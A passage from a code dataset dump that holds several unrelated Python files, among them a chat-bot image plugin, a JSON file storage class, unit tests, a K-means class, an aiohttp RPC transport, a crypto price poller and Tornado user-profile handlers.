config.toGetNum = int(digitalConversionDict[info[1]])\n else:\n if info[1].isdigit():\n config.toGetNum = int(info[1])\n else:\n send.text(\"能不能用阿拉伯数字?\")\n # logger.info('非数字')\n return None\n else: # 未指定数量,默认1\n config.toGetNum = 1\n config.tags = [i for i in list(set(re.split(r\"[,, ]\", info[2]))) if i != \"\"]\n if info[3]: # r18关键字\n config.level = 1\n return config\n\n\n@deco.on_regexp(setuPattern)\n@deco.ignore_botself\n@deco.queued_up\ndef receive_group_msg(ctx: GroupMsg):\n config = check_and_processing(ctx)\n if config is not None:\n setu = Setu(ctx, config)\n setu.main()\n del setu\n gc.collect()\n\n\n@deco.on_regexp(setuPattern)\n@deco.ignore_botself\n@deco.queued_up\ndef receive_friend_msg(ctx: FriendMsg):\n config = check_and_processing(ctx)\n if config is not None:\n setu = Setu(ctx, config)\n setu.main()\n del setu\n gc.collect()\n","sub_path":"plugins/bot_Setu/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"556913837","text":"#!/usr/bin/python3\n\"\"\" This Class define FileStorage Class\"\"\"\n\nfrom models.base_model import BaseModel\nfrom models.user import User\nfrom models.place import Place\nfrom models.state import State\nfrom models.city import City\nfrom models.amenity import Amenity\nfrom models.review import Review\nimport json\n\n\nclass FileStorage:\n \"\"\" Class that serializes instances to a JSON file and\n deserializes JSON file to instances\n Attributes:\n __file_path: path to the JSON file\n __objects: objects will be stored (dictionary persistents)\n \"\"\"\n __file_path = \"file.json\"\n __objects = {}\n\n def all(self):\n \"\"\" Returns the dictionary of persistent objects.\"\"\"\n return FileStorage.__objects\n\n def new(self, obj):\n \"\"\" Sets in __objects the obj with key .id \"\"\"\n key = '{}.{}'.format(type(obj).__name__, obj.id)\n FileStorage.__objects.update({key: obj})\n\n def save(self):\n \"\"\" Serialize __objects to the JSON file \"\"\"\n\n JSON_dict_dump = {}\n for key in FileStorage.__objects.keys():\n JSON_dict_dump[key] = FileStorage.__objects[key].to_dict()\n\n with open(FileStorage.__file_path, mode='w', encoding='UTF-8') as f:\n json.dump(JSON_dict_dump, f)\n\n def reload(self):\n \"\"\" Serializes __objects to the JSON file (path: __file_path) \"\"\"\n\n nc = {\"BaseModel\": BaseModel,\n \"User\": User,\n \"Place\": Place,\n \"State\": State,\n \"City\": City,\n \"Amenity\": Amenity,\n \"Review\": Review}\n\n try:\n with open(FileStorage.__file_path, 'r', encoding=\"UTF-8\") as f:\n json_d_load = json.load(f)\n\n for key in json_d_load:\n\n class_obj = json_d_load[key][\"__class__\"]\n\n FileStorage.__objects[key] = nc[class_obj](**json_d_load[key])\n\n except Exception:\n pass\n","sub_path":"models/engine/file_storage.py","file_name":"file_storage.py","file_ext":"py","file_size_in_byte":1939,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"2950682","text":"# License: Simplified BSD, 2014\n# See LICENSE.txt for more information\nfrom __future__ import absolute_import, print_function, division, unicode_literals\n\nimport numpy as np\nfrom numpy.testing import assert_allclose\nimport itertools\nfrom scidbpy.utils import broadcastable\nfrom scidbpy._py3k_compat import genfromstr\n\n\ndef test_gen_from_string():\n s = '\\n'.join(map(str, range(10)))\n a = genfromstr(s, dtype=float)\n assert_allclose(a, np.arange(10))\n\n\ndef test_broadcastable():\n for ndim1 in range(1, 4):\n for ndim2 in range(1, 4):\n for shape1 in itertools.permutations(range(1, 4), ndim1):\n for shape2 in itertools.permutations(range(1, 4), ndim2):\n try:\n np.broadcast(np.zeros(shape1),\n np.zeros(shape2))\n result = True\n except ValueError:\n result = False\n assert result == broadcastable(shape1, shape2)\n","sub_path":"scidbpy/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":1013,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"123538190","text":"import transaction\nfrom io import BytesIO\nfrom pyramid.compat import bytes_, binary_type, text_type\nimport ptah\nfrom ptah.testing import PtahTestCase\n\n\nclass TestBlob(PtahTestCase):\n\n _includes = ('ptahcms',)\n\n def test_blob(self):\n import ptahcms\n\n blob = ptahcms.blob_storage.add(BytesIO(bytes_('blob data','utf-8')))\n self.assertTrue(ptahcms.IBlob.providedBy(blob))\n self.assertEqual(blob.read(), bytes_('blob data','utf-8'))\n self.assertTrue(ptahcms.IBlobStorage.providedBy(ptahcms.blob_storage))\n\n def test_blob_create(self):\n import ptahcms\n\n blob = ptahcms.blob_storage.create()\n self.assertTrue(ptahcms.IBlob.providedBy(blob))\n self.assertEqual(blob.read(), None)\n\n def test_blob_metadata(self):\n import ptahcms\n\n blob = ptahcms.blob_storage.add(\n BytesIO(bytes_('blob data','utf-8')),\n filename='test.txt', mimetype='text/plain')\n\n self.assertEqual(blob.filename, 'test.txt')\n self.assertEqual(blob.mimetype, 'text/plain')\n\n def test_blob_info(self):\n import ptahcms\n blob = ptahcms.blob_storage.add(\n BytesIO(bytes_('blob data','utf-8')),\n filename='test.txt', mimetype='text/plain')\n\n info = blob.info()\n self.assertEqual(info['__uri__'], blob.__uri__)\n self.assertEqual(info['filename'], 'test.txt')\n self.assertEqual(info['mimetype'], 'text/plain')\n\n def test_blob_resolver(self):\n import ptahcms\n\n blob = ptahcms.blob_storage.add(BytesIO(bytes_('blob data','utf-8')))\n\n blob_uri = blob.__uri__\n transaction.commit()\n\n blob = ptah.resolve(blob_uri)\n\n self.assertEqual(blob.__uri__, blob_uri)\n self.assertEqual(blob.read(), bytes_('blob data','utf-8'))\n\n def test_blob_with_parent(self):\n import ptahcms\n\n class MyContent(ptahcms.Node):\n __name__ = ''\n __mapper_args__ = {'polymorphic_identity': 'mycontent'}\n __uri_factory__ = ptah.UriFactory('test')\n\n content = MyContent()\n content_uri = content.__uri__\n ptah.get_session().add(content)\n\n blob_uri = ptahcms.blob_storage.add(\n BytesIO(bytes_('blob data','utf-8')), content).__uri__\n transaction.commit()\n\n blob = ptah.resolve(blob_uri)\n self.assertEqual(blob.__parent_ref__.__uri__, content_uri)\n\n blob = ptahcms.blob_storage.getByParent(content_uri)\n self.assertEqual(blob.__uri__, blob_uri)\n\n def test_blob_write(self):\n import ptahcms\n\n blob_uri = ptahcms.blob_storage.add(\n BytesIO(bytes_('blob data','utf-8'))).__uri__\n blob = ptah.resolve(blob_uri)\n blob.write(bytes_('new data','utf-8'))\n transaction.commit()\n\n blob = ptah.resolve(blob_uri)\n self.assertEqual(blob.read(), bytes_('new data','utf-8'))\n\n def test_blob_rest_data(self):\n import ptahcms\n from ptahcms.rest import blobData\n\n blob = ptahcms.blob_storage.add(\n BytesIO(bytes_('blob data','utf-8')),\n filename='test.txt', mimetype='text/plain')\n\n response = blobData(blob, self.request)\n self.assertEqual(response.body, bytes_('blob data','utf-8'))\n self.assertEqual(\n response.headerlist,\n [('Content-Type', bytes_('text/plain')),\n ('Content-Disposition', bytes_('filename=\"test.txt\"','utf-8')),\n ('Content-Length', '9')])\n\n def test_blob_rest_data_headers_unicode(self):\n import ptahcms\n from ptahcms.rest import blobData\n\n blob = ptahcms.blob_storage.add(\n BytesIO(bytes_('blob data','utf-8')),\n filename='test.jpg', mimetype=text_type('image/jpeg'))\n\n response = blobData(blob, self.request)\n\n headers = response.headers\n for hdr in headers:\n if hdr.lower() != 'content-length':\n self.assertTrue(isinstance(headers[hdr], binary_type))\n","sub_path":"ptahcms/tests/test_blobstorage.py","file_name":"test_blobstorage.py","file_ext":"py","file_size_in_byte":4007,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"333669635","text":"import tkinter\r\nfrom tkinter import messagebox\r\nfrom tkinter import *\r\n\r\nclass Person :\r\n def __init__(self, name):\r\n self.name = name\r\n\r\ndef MakeItJohn() :\r\n First = Person('John')\r\n messagebox.showinfo('This is current owner name', First.name)\r\n\r\ndef MakeItMatt() :\r\n First = Person('Matt')\r\n messagebox.showinfo('This is current owner name', First.name)\r\n\r\nroot = Tk()\r\n\r\nMattButton = tkinter.Button(root, text = 'Give ownership to Matt', command = MakeItMatt)\r\nJohnButton = tkinter.Button(root, text = 'Give ownership to John', command = MakeItJohn)\r\n\r\nroot.geometry(\"300x200\")\r\nMattButton.pack()\r\nJohnButton.pack()\r\nroot.mainloop()","sub_path":"ButtonTutorial.py","file_name":"ButtonTutorial.py","file_ext":"py","file_size_in_byte":658,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"26223172","text":"from flask import Response, Blueprint, jsonify, request\nfrom flask.views import MethodView\n\nfrom kraken import auth\nfrom arkos import storage, updates\nfrom kraken.messages import Message, push_record\nfrom kraken.utilities import as_job, job_response\n\nbackend = Blueprint(\"updates\", __name__)\n\n\nclass UpdatesAPI(MethodView):\n @auth.required()\n def get(self, id):\n ups = []\n data = storage.updates.get(\"updates\")\n if request.args.get(\"rescan\", None) or not data:\n data = updates.check_updates()\n for x in data:\n if id == data[\"id\"]:\n return jsonify(update={\"id\": data[\"id\"], \"info\": data[\"info\"]})\n ups.append({\"id\": data[\"id\"], \"info\": data[\"info\"]})\n return jsonify(updates=ups)\n \n @auth.required()\n def post(self):\n id = as_job(_post)\n return job_response(id)\n \n def _post(self):\n updates.install_updates(Message())\n push_record(\"updates\", updates.check_updates())\n\n\nupdates_view = UpdatesAPI.as_view('updates_api')\nbackend.add_url_rule('/updates', defaults={'id': None}, \n view_func=updates_view, methods=['GET',])\nbackend.add_url_rule('/updates', view_func=updates_view, methods=['POST',])\nbackend.add_url_rule('/updates/', view_func=updates_view, methods=['GET',])\n","sub_path":"kraken/frameworks/updates.py","file_name":"updates.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"253565995","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Dec 21 11:49:34 2017\n\n@author: richa\n\"\"\"\n\nimport numpy as np\nfrom scipy.spatial import distance\n\nclass K_means():\n '''\n \n '''\n def __init__(self, n_clusters = 2, max_iter = 50, \n tol= 1e-4, random_state = 0):\n self._max_iter = max_iter\n self._tol = tol\n self._n_clusters = n_clusters\n self._seed = random_state\n self._labels = None\n self._centroids = None\n \n def _get_centroids_from_data(self, data):\n # to select k centroids from data\n np.random.seed(self._seed)\n selected_rows = np.random.randint(0, \n self._get_num_observations(data), \n size = self._n_clusters)\n self._centroids = np.array(data)[selected_rows, :]\n \n def _get_num_observations(self, data):\n return (np.array(data)).shape[0]\n\n def _get_num_features(self, data):\n # return the number of features based on input data.\n data = np.array(data)\n return data.shape[1]\n\n def _get_labels(self, data):\n # to obtain the labels in the dataset based on the input centroids\n self._labels = distance.cdist(data, self._centroids).argmin(axis = 1)\n\n def _get_centroids(self, data):\n labels = self._labels\n list_centroids = [np.average(data[labels == j, ], axis =0) \n for j in range(self._n_clusters)]\n self._centroids = np.vstack(list_centroids)\n\n def _should_stop(self, old_centroids, iters):\n if iters > self._max_iter:\n return True\n else:\n if old_centroids is None:\n return False\n else:\n return (np.abs(old_centroids - self._centroids).sum() < self._tol)\n \n def fit(self, data):\n # initiating centroids, iteration, old_centroids \n iters = 0\n old_centroids = self._centroids\n self._get_centroids_from_data(data)\n \n # running the k means\n while not self._should_stop(old_centroids, iters):\n # assigning\n old_centroids = self._centroids\n iters += 1\n \n # calculating the labels and centroids\n self._get_labels(data)\n self._get_centroids(data)\n ","sub_path":"K_means.py","file_name":"K_means.py","file_ext":"py","file_size_in_byte":2343,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"18945007","text":"# -*- coding: utf-8 -*-\n\"\"\"\nЗадание 6.2b\n\nСделать копию скрипта задания 6.2a.\n\nДополнить скрипт: Если адрес был введен неправильно, запросить адрес снова.\n\nОграничение: Все задания надо выполнять используя только пройденные темы.\n\"\"\"\n#Попытка раз. работает но выглядит оч криво\n'''\nip=input('ip adress: ')\nip_oct=ip.split('.')\nbig=False\nip_correct=False\n#проверка ввода\n\nwhile not ip_correct:\n ip_oct=ip.split('.')\n if len(ip_oct) == 4 and (''.join(ip_oct)).isdigit(): #4 октета и цифры\n i=-1\n while i=0: #непустой октет и не минусовое значение\n big=True\n ip_correct=True\n else:\n big=False\n break\n #последняя проверка и ответы\n if big:\n if ip == '0.0.0.0':\n print('unassigned')\n elif ip == '255.255.255.255':\n print('local broadcast')\n elif int(ip_oct[0]) <= 223:\n print('unicast')\n elif int(ip_oct[0]) <= 239 and int(ip_oct[0]) >= 224:\n print('multicast')\n else:\n print('unused')\n else:\n print('Неправильный IP-адрес')\n ip=input('ip adress: ')\n#это не глупо если это работает 2\n#но под конец запутался уже\n'''\n# попытка 2\n\nwhile True:\n ip = input('ip: ')\n ip_oct=ip.split('.')\n correct_ip=True\n if not len(ip_oct) == 4:\n correct_ip=False\n else:\n for num in ip_oct:\n if not (num.isdigit() and 0 <= int(num) <= 255 and correct_ip):\n correct_ip=False\n break\n if correct_ip: \n if ip == '0.0.0.0':\n print('unassigned')\n break\n elif ip == '255.255.255.255':\n print('local broadcast')\n break\n elif int(ip_oct[0]) <= 223:\n print('unicast')\n break\n elif 239 >= int(ip_oct[0]) >= 224:\n print('multicast')\n break\n else:\n print('unused')\n break\n else:\n print('Неправильный IP-адрес')","sub_path":"exercises/06_control_structures/task_6_2b.py","file_name":"task_6_2b.py","file_ext":"py","file_size_in_byte":2249,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"548807307","text":"#!/usr/bin/env python3\n\n# standard\nimport time\nimport json\nfrom decimal import Decimal\nfrom urllib.request import Request, urlopen\n\n# custom\nfrom libraries.logger import logger\nfrom libraries.messenger import smsalert\n\ndef poller( reservationprice: float ) -> None:\n # define request\n request = Request('https://api.ddex.io/v4/markets/ETH-USDC/orderbook?level=1', headers={'User-Agent': 'Mozilla/5.0'})\n\n # get content and its encoding\n content = urlopen(request).read()\n encoding = urlopen(request).info().get_content_charset('utf-8')\n while True:\n # process content\n dictionary = json.loads(content.decode(encoding))\n bidprice = dictionary[\"data\"][\"orderbook\"][\"bids\"][0][\"price\"]\n if Decimal(bidprice) < reservationprice:\n time.sleep(5) # DDEX limits API requests to 30 per minute per IP\n else:\n smsalert(f'the last bid [{bidprice} USDC] for ETH exceeded {reservationprice} USDC') # send alert to mobile phone\n break # exit loop\n\nif __name__ == \"__main__\":\n # set price alert\n reservationprice = 398.95\n # GOING LONG?\n # Then sell when buyers are meeting/exceeding this reservation price.\n try:\n # poll DDEX servers\n poller( reservationprice )\n except KeyboardInterrupt:\n logger.debug( f'exception: keyboard interuption.' )\n except Exception as e:\n logger.debug( f'exception: {e}.' )\n logger.debug( f'exiting...' )\n exit(0)\n # Loop runtime on MacBook Pro:\n # real\t0m3.205s\n # user\t0m0.393s\n # sys\t0m0.105s\n","sub_path":"poller/bid-reservation-price-level-alert.py","file_name":"bid-reservation-price-level-alert.py","file_ext":"py","file_size_in_byte":1562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"397553531","text":"from sys import argv\n\n\ndef main():\n with open(argv[1]) as opencv_output:\n text = opencv_output.read()\n lines = text.split('\\n')\n output = \"\"\n for line in lines:\n tokens = line.split(\" \")\n if line[0:22] == 'pairwise_matches index':\n src_img_idx = int(tokens[4].split(\":\")[1])\n dst_img_idx = int(tokens[7].split(\":\")[1])\n if not (src_img_idx == -1) and not (dst_img_idx == -1):\n output = output + \"# {0} {1}\\n\".format(src_img_idx, dst_img_idx)\n elif line[0:7] == 'matches':\n query_x = float(tokens[9])\n query_y = float(tokens[10])\n train_x = float(tokens[17])\n train_y = float(tokens[18])\n distance = float(tokens[20])\n output = output + \"{0} {1} {2} {3} {4}\\n\".format(query_x, query_y, train_x, train_y, distance)\n with open(\"parsed_output.txt\", \"w\") as text_file:\n text_file.write(output)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"non_hugin_based_stitching/helpers/parse_opencv_output.py","file_name":"parse_opencv_output.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"374427036","text":"import tkinter as tk\r\nfrom available_time_finder import Available_time_finder\r\nimport threading\r\nimport datetime\r\n\r\nclass GUI:\r\n def __init__(self, url):\r\n self.stop_event = threading.Event()\r\n self.url = url\r\n self.interval = \"3 seconds\"\r\n self.number_results = 10\r\n self.finder = Available_time_finder(self.url, \"Lund\", self.number_results)\r\n self.create_gui()\r\n\r\n def create_gui(self):\r\n self.root = tk.Tk()\r\n self.root.title(\"Available times finder\")\r\n self.root.wm_protocol(\"WM_DELETE_WINDOW\", self.on_close)\r\n\r\n self.start_frame = tk.Frame(self.root)\r\n self.results_opt_frame = tk.Frame(self.root)\r\n self.buttons_frame = tk.Frame(self.root)\r\n self.status_frame = tk.Frame(self.root)\r\n self.list_frame = tk.Frame(self.root)\r\n\r\n pady = 10\r\n self.start_frame.pack(padx=3, pady=pady)\r\n self.results_opt_frame.pack(pady=pady)\r\n self.buttons_frame.pack(pady=pady)\r\n self.status_frame.pack(pady=pady)\r\n self.list_frame.pack(pady=pady)\r\n\r\n tk.Label(self.start_frame, text=\"Select Area:\").pack(side=\"left\")\r\n def set_area(value):\r\n self.finder.area = value\r\n areas = [\"Malmö\", \"Lund\", \"Kristianstad\"]\r\n self.area_option = tk.StringVar()\r\n self.area_option.set(self.finder.area)\r\n self.area_options = tk.OptionMenu(self.start_frame, self.area_option, *areas, command=set_area)\r\n self.area_options.config(compound=tk.CENTER)\r\n self.area_options.pack(side=\"left\")\r\n\r\n tk.Label(self.start_frame, text=\"Select refresh interval:\").pack(side=\"left\")\r\n def set_interval(value):\r\n self.interval = value\r\n intervals = [\"3 seconds\", \"10 seconds\", \"30 seconds\", \"1 minute\"]\r\n self.interval_option = tk.StringVar()\r\n self.interval_option.set(self.interval)\r\n self.interval_options = tk.OptionMenu(self.start_frame, self.interval_option, *intervals, command=set_interval)\r\n self.interval_options.config(compound=tk.CENTER)\r\n self.interval_options.pack(side=\"left\")\r\n\r\n padx = 5\r\n box_width = 12\r\n tk.Label(self.results_opt_frame, text=\"Number of results:\").pack(side=\"left\", padx=padx)\r\n self.nbr_res_entry = tk.Entry(self.results_opt_frame, width=box_width)\r\n self.nbr_res_entry.insert(0, 10)\r\n self.nbr_res_entry.pack(side=\"left\", padx=padx)\r\n\r\n padx = 20\r\n width = 10\r\n self.start_button = tk.Button(self.buttons_frame, text=\"Start\", width=width, command=self.on_start)\r\n self.start_button.pack(side=\"left\", padx=padx)\r\n self.stop_button = tk.Button(self.buttons_frame, text=\"Stop\", width=width, command=self.on_stop)\r\n self.stop_button.pack(side=\"left\", padx=padx)\r\n self.stop_button[\"state\"] = \"disabled\"\r\n\r\n padx = 5\r\n width = 10\r\n tk.Label(self.status_frame, text=\"Status:\").pack(side=\"left\")\r\n self.status_label = tk.Label(self.status_frame, text=\"disconnected\", width=width, bg=\"red\")\r\n self.status_label.pack(side=\"left\", padx=padx)\r\n\r\n tk.Label(self.status_frame, text=\"Next refresh in:\").pack(side=\"left\", padx=padx)\r\n self.timer_label = tk.Label(self.status_frame)\r\n self.timer_label.pack(side=\"left\")\r\n\r\n wlist = 50\r\n hlist = 15\r\n scrollbar = tk.Scrollbar(self.list_frame)\r\n scrollbar.pack(side='right', fill=tk.Y)\r\n self.times_list = tk.Listbox(self.list_frame, width=wlist, height=hlist)\r\n self.times_list.pack()\r\n self.times_list.config(yscrollcommand=scrollbar.set)\r\n scrollbar.config(command=self.times_list.yview)\r\n\r\n self.root.mainloop()\r\n\r\n def on_start(self):\r\n if self.stop_event.is_set():\r\n self.stop_event.clear()\r\n self.start_button[\"state\"] = \"disabled\"\r\n self.stop_button[\"state\"] = \"normal\"\r\n try:\r\n self.finder.number_results = int(self.nbr_res_entry.get())\r\n except:\r\n self.nbr_res_entry.delete(0, \"end\")\r\n self.nbr_res_entry.insert(0, 10)\r\n self.finder.number_results = 10\r\n self.finder.connect()\r\n self.status_label.config(text=\"Connected\", bg=\"green\")\r\n self.get_results()\r\n\r\n def get_results(self):\r\n if not self.stop_event.is_set():\r\n interval = self.interval_to_sec()\r\n times = self.finder.get_results()\r\n self.times_list.delete(0,'end')\r\n for time in times:\r\n self.times_list.insert(tk.END, time)\r\n t = threading.Timer(interval, self.get_results)\r\n t.daemon = True\r\n t.start()\r\n self.count_down(interval)\r\n\r\n def count_down(self, seconds):\r\n if self.stop_event.is_set():\r\n return\r\n if seconds > 0:\r\n self.timer_label['text'] = seconds\r\n t = threading.Timer(1, self.count_down, [seconds-1])\r\n t.daemon = True\r\n t.start()\r\n else:\r\n self.timer_label['text'] = seconds\r\n\r\n def interval_to_sec(self):\r\n choice, unit = self.interval.split(\" \")\r\n if unit == \"minute\" or unit == \"minutes\":\r\n return int(choice)*60\r\n else:\r\n return int(choice)\r\n\r\n def on_stop(self):\r\n self.stop_event.set()\r\n self.start_button[\"state\"] = \"normal\"\r\n self.stop_button[\"state\"] = \"disabled\"\r\n self.status_label.config(text=\"Disconnected\", bg=\"red\")\r\n\r\n def on_close(self):\r\n self.on_stop()\r\n try:\r\n self.finder.close_driver()\r\n except:\r\n pass\r\n self.root.destroy()\r\n\r\nif __name__ == '__main__':\r\n url = \"https://ventus.enalog.se/Booking/Booking/Index/skane\"\r\n GUI(url)","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":5806,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"85563385","text":"import asyncio\n\nimport aiohttp\nfrom aiohttp.web_request import BaseRequest\nfrom typing import Type\n\nfrom venom.common import FieldMask\nfrom venom.exceptions import Error, ErrorResponse\nfrom venom.protocol import JSONProtocol, Protocol, URIStringProtocol, URIStringDictMessageTranscoder\nfrom venom.rpc import RequestContext\nfrom venom.rpc.comms import AbstractClient\nfrom venom.rpc.method import Method, HTTPVerb, HTTPFieldLocation\n\ntry:\n from aiohttp import web, ClientSession\nexcept ImportError:\n raise RuntimeError(\"You must install the 'aiohttp' package to use the AioHTTP features of Venom RPC\")\n\n\nclass AioHTTPRequestContext(RequestContext):\n request: BaseRequest\n\n def __init__(self, request: BaseRequest):\n self.request = request\n\n\ndef _route_handler(venom: 'venom.rpc.Venom', method: Method, protocol_factory: Type[Protocol]):\n rpc_response = protocol_factory(method.response)\n rpc_error_response = protocol_factory(ErrorResponse)\n\n http_status = method.http_status\n\n http_field_locations = method.http_field_locations()\n\n http_request_body = JSONProtocol(method.request, FieldMask(http_field_locations[HTTPFieldLocation.BODY]))\n\n http_request_query = URIStringDictMessageTranscoder(URIStringProtocol,\n method.request,\n FieldMask(http_field_locations[HTTPFieldLocation.QUERY]))\n\n http_request_path = URIStringDictMessageTranscoder(URIStringProtocol,\n method.request,\n FieldMask(http_field_locations[HTTPFieldLocation.PATH]))\n\n async def handler(http_request):\n try:\n request = http_request_body.unpack(await http_request.read())\n http_request_query.decode(http_request.url.query, request)\n http_request_path.decode(http_request.match_info, request)\n\n response = await venom.invoke(method, request, context=AioHTTPRequestContext(http_request))\n return web.Response(body=rpc_response.pack(response),\n content_type=rpc_response.mime,\n status=http_status)\n except Error as e:\n return web.Response(body=rpc_error_response.pack(e.format()),\n content_type=rpc_error_response.mime,\n status=e.http_status)\n\n return handler\n\n\ndef _path_field_template(field, default):\n if not field.repeated and field.type == int:\n return f'{field.json_name}:\\d+'\n return default\n\n\ndef create_app(venom: 'venom.rpc.Venom',\n app: web.Application = None,\n protocol_factory: Type[Protocol] = JSONProtocol):\n if app is None:\n app = web.Application()\n\n for method in venom.iter_methods():\n app.router.add_route(method.http_method.value,\n method.format_http_path(json_names=True, field_template_hook=_path_field_template),\n _route_handler(venom, method, protocol_factory))\n\n return app\n\n\nclass HTTPClient(AbstractClient):\n def __init__(self,\n stub: Type['venom.rpc.Service'],\n base_url: str,\n *,\n protocol_factory: Type[Protocol] = None,\n session: aiohttp.ClientSession = None,\n **session_kwargs):\n super().__init__(stub, protocol_factory=protocol_factory)\n self._base_url = base_url\n\n if session is None:\n self._session = aiohttp.ClientSession(**session_kwargs)\n else:\n self._session = session\n\n async def invoke(self,\n method: Method,\n request: 'venom.message.Message',\n *,\n context: 'venom.RequestContext' = None,\n loop: 'asyncio.AbstractEventLoop' = None,\n timeout: int = None):\n\n # TODO optional timeouts\n\n if method.http_path_parameters():\n url = self._base_url + method.http_path.format(**request)\n else:\n url = self._base_url + method.http_path\n\n headers = None\n if method.http_method in (HTTPVerb.POST, HTTPVerb.PUT, HTTPVerb.PATCH):\n headers = {'content-type': self._protocol_factory.mime}\n\n http_field_locations = method.http_field_locations()\n\n params = URIStringDictMessageTranscoder(\n URIStringProtocol,\n method.request,\n FieldMask(http_field_locations[HTTPFieldLocation.QUERY])).encode(request)\n\n body = self._protocol_factory(method.request,\n http_field_locations[HTTPFieldLocation.BODY]).pack(request)\n\n async with self._session.request(method.http_method.value.lower(), url,\n headers=headers,\n data=body,\n params=params) as response:\n if 200 <= response.status < 400:\n return self._protocol_factory(method.response).unpack(await response.read())\n else:\n self._protocol_factory(ErrorResponse).unpack(await response.read()).raise_()\n\n # XXX not sure if session should be opened for each request, and why an unclosed session is such a bad thing.\n def __del__(self):\n if self._session:\n self._session.close()\n\n\nClient = HTTPClient\n","sub_path":"venom/rpc/comms/aiohttp.py","file_name":"aiohttp.py","file_ext":"py","file_size_in_byte":5542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"561596541","text":"#coding=utf-8\nfrom utils.response_code import RET\nfrom utils.commons import required_login\nfrom utils.qiniu_storage import storage\nfrom .BaseHandler import BaseHandler\n\nimport constants\nimport logging\n\nclass AvatarHandler(BaseHandler):\n\t#/api/profile/avatar\n\t@required_login\n\tdef post(self):\n\t\tfiles = self.request.files.get(\"avatar\") ####\n\t\t#logging.debug(self.request.files) #{u'file': [{'body':'','content_type': u'image/png', 'filename': u'qq.png'}]}\n\t\tif not files:\n\t\t\treturn self.write(dict(errcode=RET.PARAMERR, errmsg=\"未传图片\"))\n\t\tavatar = files[0][\"body\"]\n\t\t#logging.debug(\"AvatarHandler type(files):%s\" %(type(files))) #\n\t\ttry:\n\t\t\tfile_name = storage(avatar)\n\t\t\tlogging.debug(file_name) #avatar\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\t\treturn self.write(dict(errcode=RET.THIRDERR, errmsg=\"上传失败\"))\n\n\t\tuser_id = self.session.data[\"user_id\"] #\n\t\tlogging.debug(user_id)\n\t\tsql = \"update ih_user_profile set up_avatar=%(avatar)s where up_user_id=%(user_id)s;\"\n\t\ttry:\n\t\t\trow_count = self.db.execute_rowcount(sql, avatar=file_name, user_id=user_id)\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\t\treturn self.write(dict(errcode=RET.DBERR, errmsg=\"保存错误\"))\n\t\t#data:\"http://oxy4g2gly.bkt.clouddn.com/FmyaPesgUtGf5K5lZaXUtBLd046f\"\n\t\tself.write(dict(errcode=RET.OK, errmsg=\"保存成功\", data=\"%s%s\" % (constants.QINIU_URL_PREFIX, file_name)))\n\n\nclass ProfileHandler(BaseHandler):\n\t#/api/profile\n\t@required_login\n\tdef get(self):\n\t\tuser_id = self.session.data[\"user_id\"]\n\t\ttry:\n\t\t\tret = self.db.get(\"select up_name, up_mobile, up_avatar from ih_user_profile where up_user_id=%s\", user_id)\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\t\treturn self.write(dict(errcode=RET.PARAMERR, errmsg=\"\"))\n\t\tif ret[\"up_avatar\"]:\n\t\t\timg_url = constants.QINIU_URL_PREFIX + ret[\"up_avatar\"]\n\t\telse:\n\t\t\timg_url = None\n\t\treturn self.write({\"errcode\":RET.OK, \"errmsg\":\"OK\", \"data\":{\"user_id\":user_id, \"name\":ret[\"up_name\"], \"mobile\":ret[\"up_mobile\"], \"avatar\":img_url}})\n\n\nclass AuthHandler(BaseHandler):\n\t\"\"\"实名认证\"\"\"\n\t#/api/profile/auth\n\t@required_login\n\tdef get(self):\n\t\tuser_id = self.session.data[\"user_id\"]\n\n\t\ttry:\n\t\t\tret = self.db.get(\"select up_real_name,up_id_card from ih_user_profile where up_user_id=%s;\", user_id)\n\t\texcept Exception as e:\n\t\t\tlogging.error(e)\n\t\t\treturn self.write({\"errcode\":RET.DBERR, \"errmsg\":\"get data failed\"})\n\t\tlogging.debug(ret) #{'up_id_card': None, 'up_real_name': None}\n\t\tif not ret:\n\t\t\treturn self.write({\"errcode\":RET.NODATA, \"errmsg\":\"no data\"})\n\t\tself.write({\"errcode\":RET.OK, \"errmsg\":\"OK\", \"data\":{\"real_name\":ret.get(\"up_real_name\", \"\"), \"id_card\":ret.get(\"up_id_card\", \"\")}})\n\n\t'''\n\t/api/profile/auth\n\t{\n\t\t\"real_name\": \"Alex\",\n\t\t\"id_card\": \"320xxxxxxx\"\n\t}\n\t'''\n\t@required_login\n\tdef post(self):\n\t\tuser_id = self.session.data[\"user_id\"]\n\t\treal_name = self.json_args.get(\"real_name\")\n\t\tid_card = self.json_args.get(\"id_card\")\n\t\tif real_name in (None, \"\") or id_card in (None, \"\"):\n\t\t\treturn self.write({\"errcode\":RET.PARAMERR, \"errmsg\":\"params error\"})\n\t\t# 判断身份证号格式\n\t\ttry:\n\t\t\tself.db.execute_rowcount(\"update ih_user_profile set up_real_name=%s, up_id_card=%s where up_user_id=%s\", real_name, id_card, user_id)\n\t\texcept Exception as 